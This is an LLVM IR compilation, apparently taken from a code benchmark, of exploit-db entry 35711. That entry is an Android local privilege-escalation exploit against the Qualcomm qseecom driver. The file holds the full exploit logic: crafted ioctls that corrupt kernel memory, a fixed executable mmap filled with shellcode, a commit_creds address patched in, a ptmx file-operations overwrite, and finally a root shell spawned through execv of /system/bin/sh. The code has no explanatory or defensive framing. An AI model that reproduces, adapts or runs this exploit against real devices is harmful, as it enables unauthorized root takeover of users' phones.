; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/android/local/extr_35711.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/android/local/extr_35711.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.qseecom_send_modfd_cmd_req = type { i32, i32, i32, %struct.TYPE_2__*, i32, i8*, i8*, i8* }
%struct.TYPE_2__ = type { i32, i32 }
%struct.qseecom_set_sb_mem_param_req = type { i32, i32, i32, %struct.TYPE_2__*, i32, i8*, i8*, i8* }

@.str = private unnamed_addr constant [10 x i8] c"mypid %d\0A\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"/dev/qseecom\00", align 1
@.str.2 = private unnamed_addr constant [5 x i8] c"open\00", align 1
@PR_SET_NAME = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [10 x i8] c"GodFather\00", align 1
@g_pid = common dso_local global i32 0, align 4
@g_tgid = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [16 x i8] c"ihoo.darkytools\00", align 1
@QSEECOM_IOCTL_SET_MEM_PARAM_REQ = common dso_local global i32 0, align 4
@.str.5 = private unnamed_addr constant [46 x i8] c"QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \0A\00", align 1
@.str.6 = private unnamed_addr constant [27 x i8] c"QSEECOM_IOCTL_SEND_CMD_REQ\00", align 1
@QSEECOM_IOCTL_SEND_MODFD_CMD_REQ = common dso_local global i32 0, align 4
@.str.7 = private unnamed_addr constant [14 x i8] c"return %p %p\0A\00", align 1
@.str.8 = private unnamed_addr constant [32 x i8] c"QSEECOM_IOCTL_SEND_CMD_REQ end\0A\00", align 1
@.str.9 = private unnamed_addr constant [20 x i8] c"ioctl return 0x%x \0A\00", align 1
@PROT_READ = common dso_local global i32 0, align 4
@PROT_WRITE = common dso_local global i32 0, align 4
@PROT_EXEC = common dso_local global i32 0, align 4
@MAP_PRIVATE = common dso_local global i32 0, align 4
@MAP_FIXED = common dso_local global i32 0, align 4
@MAP_ANONYMOUS = common dso_local global i32 0, align 4
@.str.10 = private unnamed_addr constant [17 x i8] c"mmap return %p \0A\00", align 1
@shell_code2 = common dso_local global i32 0, align 4
@MyCommitCred = common dso_local global i64 0, align 8
@.str.11 = private unnamed_addr constant [4 x i8] c"%p\0A\00", align 1
@PTMX_FOPS = common dso_local global i64 0, align 8
@.str.12 = private unnamed_addr constant [3 x i8] c"sh\00", align 1
@__const.main.argv1 = private unnamed_addr constant [2 x i8*] [i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.12, i32 0, i32 0), i8* null], align 16
@.str.13 = private unnamed_addr constant [15 x i8] c"/system/bin/sh\00", align 1
@.str.14 = private unnamed_addr constant [6 x i8] c"execv\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i8*, align 8
  %9 = alloca i32*, align 8
  %10 = alloca i32, align 4
  %11 = alloca %struct.qseecom_send_modfd_cmd_req, align 8
  %12 = alloca %struct.qseecom_set_sb_mem_param_req, align 8
  %13 = alloca i32, align 4
  %14 = alloca i8*, align 8
  %15 = alloca i32*, align 8
  %16 = alloca [2 x i8*], align 16
  %17 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %18 = call i32 (...) @getpid()
  %19 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str, i64 0, i64 0), i32 %18)
  store i32 -1, i32* %6, align 4
  %20 = call i32 @open(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0), i32 0)
  store i32 %20, i32* %7, align 4
  %21 = load i32, i32* %7, align 4
  %22 = icmp slt i32 %21, 0
  br i1 %22, label %23, label %26

23:                                               ; preds = %2
  %24 = call i32 @perror(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.2, i64 0, i64 0))
  %25 = call i32 @exit(i32 -1) #4
  unreachable

26:                                               ; preds = %2
  %27 = call i8* @malloc(i32 400)
  store i8* %27, i8** %8, align 8
  %28 = load i8*, i8** %8, align 8
  %29 = call i32 @memset(i8* %28, i32 0, i32 400)
  %30 = load i8*, i8** %8, align 8
  %31 = bitcast i8* %30 to i32*
  store i32* %31, i32** %9, align 8
  store i32 0, i32* %10, align 4
  store i32 0, i32* %10, align 4
  br label %32

32:                                               ; preds = %40, %26
  %33 = load i32, i32* %10, align 4
  %34 = icmp slt i32 %33, 24
  br i1 %34, label %35, label %43

35:                                               ; preds = %32
  %36 = load i32*, i32** %9, align 8
  %37 = load i32, i32* %10, align 4
  %38 = sext i32 %37 to i64
  %39 = getelementptr inbounds i32, i32* %36, i64 %38
  store i32 1, i32* %39, align 4
  br label %40

40:                                               ; preds = %35
  %41 = load i32, i32* %10, align 4
  %42 = add nsw i32 %41, 1
  store i32 %42, i32* %10, align 4
  br label %32

43:                                               ; preds = %32
  %44 = load i32, i32* @PR_SET_NAME, align 4
  %45 = call i32 @prctl(i32 %44, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.3, i64 0, i64 0), i32 0, i32 0, i32 0)
  %46 = call i32 (...) @getpid()
  store i32 %46, i32* @g_pid, align 4
  %47 = load i32, i32* @g_pid, align 4
  store i32 %47, i32* @g_tgid, align 4
  %48 = load i32, i32* @PR_SET_NAME, align 4
  %49 = call i32 @prctl(i32 %48, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.4, i64 0, i64 0), i32 0, i32 0, i32 0)
  %50 = call i32 @obtain_dma_buf_fd(i32 8192)
  %51 = getelementptr inbounds %struct.qseecom_set_sb_mem_param_req, %struct.qseecom_set_sb_mem_param_req* %12, i32 0, i32 4
  store i32 %50, i32* %51, align 8
  %52 = load i8*, i8** %8, align 8
  %53 = getelementptr inbounds %struct.qseecom_set_sb_mem_param_req, %struct.qseecom_set_sb_mem_param_req* %12, i32 0, i32 7
  store i8* %52, i8** %53, align 8
  %54 = getelementptr inbounds %struct.qseecom_set_sb_mem_param_req, %struct.qseecom_set_sb_mem_param_req* %12, i32 0, i32 0
  store i32 8192, i32* %54, align 8
  %55 = load i32, i32* %7, align 4
  %56 = load i32, i32* @QSEECOM_IOCTL_SET_MEM_PARAM_REQ, align 4
  %57 = call i32 @ioctl(i32 %55, i32 %56, %struct.qseecom_set_sb_mem_param_req* %12)
  store i32 %57, i32* %6, align 4
  %58 = load i32, i32* %6, align 4
  %59 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([46 x i8], [46 x i8]* @.str.5, i64 0, i64 0), i32 %58)
  %60 = load i8*, i8** %8, align 8
  %61 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 6
  store i8* %60, i8** %61, align 8
  %62 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 1
  store i32 400, i32* %62, align 4
  %63 = load i8*, i8** %8, align 8
  %64 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 5
  store i8* %63, i8** %64, align 8
  %65 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 2
  store i32 400, i32* %65, align 8
  store i32 0, i32* %13, align 4
  store i32 0, i32* %13, align 4
  br label %66

66:                                               ; preds = %82, %43
  %67 = load i32, i32* %13, align 4
  %68 = icmp slt i32 %67, 4
  br i1 %68, label %69, label %85

69:                                               ; preds = %66
  %70 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 3
  %71 = load %struct.TYPE_2__*, %struct.TYPE_2__** %70, align 8
  %72 = load i32, i32* %13, align 4
  %73 = sext i32 %72 to i64
  %74 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %71, i64 %73
  %75 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %74, i32 0, i32 1
  store i32 0, i32* %75, align 4
  %76 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 3
  %77 = load %struct.TYPE_2__*, %struct.TYPE_2__** %76, align 8
  %78 = load i32, i32* %13, align 4
  %79 = sext i32 %78 to i64
  %80 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %77, i64 %79
  %81 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %80, i32 0, i32 0
  store i32 0, i32* %81, align 4
  br label %82

82:                                               ; preds = %69
  %83 = load i32, i32* %13, align 4
  %84 = add nsw i32 %83, 1
  store i32 %84, i32* %13, align 4
  br label %66

85:                                               ; preds = %66
  %86 = getelementptr inbounds %struct.qseecom_set_sb_mem_param_req, %struct.qseecom_set_sb_mem_param_req* %12, i32 0, i32 4
  %87 = load i32, i32* %86, align 8
  %88 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 3
  %89 = load %struct.TYPE_2__*, %struct.TYPE_2__** %88, align 8
  %90 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %89, i64 0
  %91 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %90, i32 0, i32 1
  store i32 %87, i32* %91, align 4
  %92 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 3
  %93 = load %struct.TYPE_2__*, %struct.TYPE_2__** %92, align 8
  %94 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %93, i64 0
  %95 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %94, i32 0, i32 0
  store i32 0, i32* %95, align 4
  %96 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.6, i64 0, i64 0))
  %97 = load i32, i32* %7, align 4
  %98 = load i32, i32* @QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, align 4
  %99 = bitcast %struct.qseecom_send_modfd_cmd_req* %11 to %struct.qseecom_set_sb_mem_param_req*
  %100 = call i32 @ioctl(i32 %97, i32 %98, %struct.qseecom_set_sb_mem_param_req* %99)
  store i32 %100, i32* %6, align 4
  %101 = load i32*, i32** %9, align 8
  %102 = getelementptr inbounds i32, i32* %101, i64 0
  %103 = load i32, i32* %102, align 4
  %104 = load i32*, i32** %9, align 8
  %105 = getelementptr inbounds i32, i32* %104, i64 1
  %106 = load i32, i32* %105, align 4
  %107 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.7, i64 0, i64 0), i32 %103, i32 %106)
  %108 = call i32 @perror(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str.8, i64 0, i64 0))
  %109 = load i32, i32* %6, align 4
  %110 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.9, i64 0, i64 0), i32 %109)
  %111 = load i32*, i32** %9, align 8
  %112 = getelementptr inbounds i32, i32* %111, i64 0
  %113 = load i32, i32* %112, align 4
  %114 = load i32, i32* @PROT_READ, align 4
  %115 = load i32, i32* @PROT_WRITE, align 4
  %116 = or i32 %114, %115
  %117 = load i32, i32* @PROT_EXEC, align 4
  %118 = or i32 %116, %117
  %119 = load i32, i32* @MAP_PRIVATE, align 4
  %120 = load i32, i32* @MAP_FIXED, align 4
  %121 = or i32 %119, %120
  %122 = load i32, i32* @MAP_ANONYMOUS, align 4
  %123 = or i32 %121, %122
  %124 = call i8* @mmap(i32 %113, i32 4096, i32 %118, i32 %123, i32 -1, i32 0)
  store i8* %124, i8** %14, align 8
  %125 = load i8*, i8** %14, align 8
  %126 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.10, i64 0, i64 0), i8* %125)
  %127 = load i8*, i8** %14, align 8
  %128 = bitcast i8* %127 to i32*
  store i32 -481296384, i32* %128, align 4
  %129 = load i8*, i8** %14, align 8
  %130 = ptrtoint i8* %129 to i32
  %131 = add nsw i32 %130, 4
  %132 = sext i32 %131 to i64
  %133 = inttoptr i64 %132 to i32*
  store i32 -509546482, i32* %133, align 4
  %134 = load i8*, i8** %14, align 8
  %135 = load i32, i32* @shell_code2, align 4
  %136 = call i32 @memcpy(i8* %134, i32 %135, i32 400)
  %137 = load i8*, i8** %14, align 8
  %138 = bitcast i8* %137 to i32*
  store i32* %138, i32** %15, align 8
  store i32 0, i32* %13, align 4
  br label %139

139:                                              ; preds = %163, %85
  %140 = load i32, i32* %13, align 4
  %141 = icmp slt i32 %140, 10
  br i1 %141, label %142, label %166

142:                                              ; preds = %139
  %143 = load i32*, i32** %15, align 8
  %144 = load i32, i32* %13, align 4
  %145 = sext i32 %144 to i64
  %146 = getelementptr inbounds i32, i32* %143, i64 %145
  %147 = load i32, i32* %146, align 4
  %148 = icmp eq i32 %147, -286331154
  br i1 %148, label %149, label %156

149:                                              ; preds = %142
  %150 = load i64, i64* @MyCommitCred, align 8
  %151 = trunc i64 %150 to i32
  %152 = load i32*, i32** %15, align 8
  %153 = load i32, i32* %13, align 4
  %154 = sext i32 %153 to i64
  %155 = getelementptr inbounds i32, i32* %152, i64 %154
  store i32 %151, i32* %155, align 4
  br label %156

156:                                              ; preds = %149, %142
  %157 = load i32*, i32** %15, align 8
  %158 = load i32, i32* %13, align 4
  %159 = sext i32 %158 to i64
  %160 = getelementptr inbounds i32, i32* %157, i64 %159
  %161 = load i32, i32* %160, align 4
  %162 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.11, i64 0, i64 0), i32 %161)
  br label %163

163:                                              ; preds = %156
  %164 = load i32, i32* %13, align 4
  %165 = add nsw i32 %164, 1
  store i32 %165, i32* %13, align 4
  br label %139

166:                                              ; preds = %139
  %167 = load i64, i64* @PTMX_FOPS, align 8
  %168 = add nsw i64 %167, 56
  %169 = trunc i64 %168 to i32
  %170 = load i8*, i8** %8, align 8
  %171 = ptrtoint i8* %170 to i32
  %172 = sub nsw i32 %169, %171
  %173 = getelementptr inbounds %struct.qseecom_send_modfd_cmd_req, %struct.qseecom_send_modfd_cmd_req* %11, i32 0, i32 3
  %174 = load %struct.TYPE_2__*, %struct.TYPE_2__** %173, align 8
  %175 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %174, i64 0
  %176 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %175, i32 0, i32 0
  store i32 %172, i32* %176, align 4
  %177 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.6, i64 0, i64 0))
  %178 = load i32, i32* %7, align 4
  %179 = load i32, i32* @QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, align 4
  %180 = bitcast %struct.qseecom_send_modfd_cmd_req* %11 to %struct.qseecom_set_sb_mem_param_req*
  %181 = call i32 @ioctl(i32 %178, i32 %179, %struct.qseecom_set_sb_mem_param_req* %180)
  store i32 %181, i32* %6, align 4
  %182 = load i32*, i32** %9, align 8
  %183 = getelementptr inbounds i32, i32* %182, i64 0
  %184 = load i32, i32* %183, align 4
  %185 = load i32*, i32** %9, align 8
  %186 = getelementptr inbounds i32, i32* %185, i64 1
  %187 = load i32, i32* %186, align 4
  %188 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.7, i64 0, i64 0), i32 %184, i32 %187)
  %189 = call i32 @perror(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str.8, i64 0, i64 0))
  %190 = load i32, i32* %6, align 4
  %191 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.9, i64 0, i64 0), i32 %190)
  %192 = call i32 (...) @run_obtain_root_privilege()
  %193 = bitcast [2 x i8*]* %16 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %193, i8* align 16 bitcast ([2 x i8*]* @__const.main.argv1 to i8*), i64 16, i1 false)
  %194 = getelementptr inbounds [2 x i8*], [2 x i8*]* %16, i64 0, i64 0
  %195 = call i32 @execv(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.13, i64 0, i64 0), i8** %194)
  store i32 %195, i32* %17, align 4
  %196 = load i32, i32* %17, align 4
  %197 = icmp ne i32 %196, 0
  br i1 %197, label %198, label %200

198:                                              ; preds = %166
  %199 = call i32 @perror(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.14, i64 0, i64 0))
  br label %200

200:                                              ; preds = %198, %166
  ret i32 0
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @getpid(...) #1

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @perror(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @memset(i8*, i32, i32) #1

declare dso_local i32 @prctl(i32, i8*, i32, i32, i32) #1

declare dso_local i32 @obtain_dma_buf_fd(i32) #1

declare dso_local i32 @ioctl(i32, i32, %struct.qseecom_set_sb_mem_param_req*) #1

declare dso_local i8* @mmap(i32, i32, i32, i32, i32, i32) #1

declare dso_local i32 @memcpy(i8*, i32, i32) #1

declare dso_local i32 @run_obtain_root_privilege(...) #1

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #3

declare dso_local i32 @execv(i8*, i8**) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
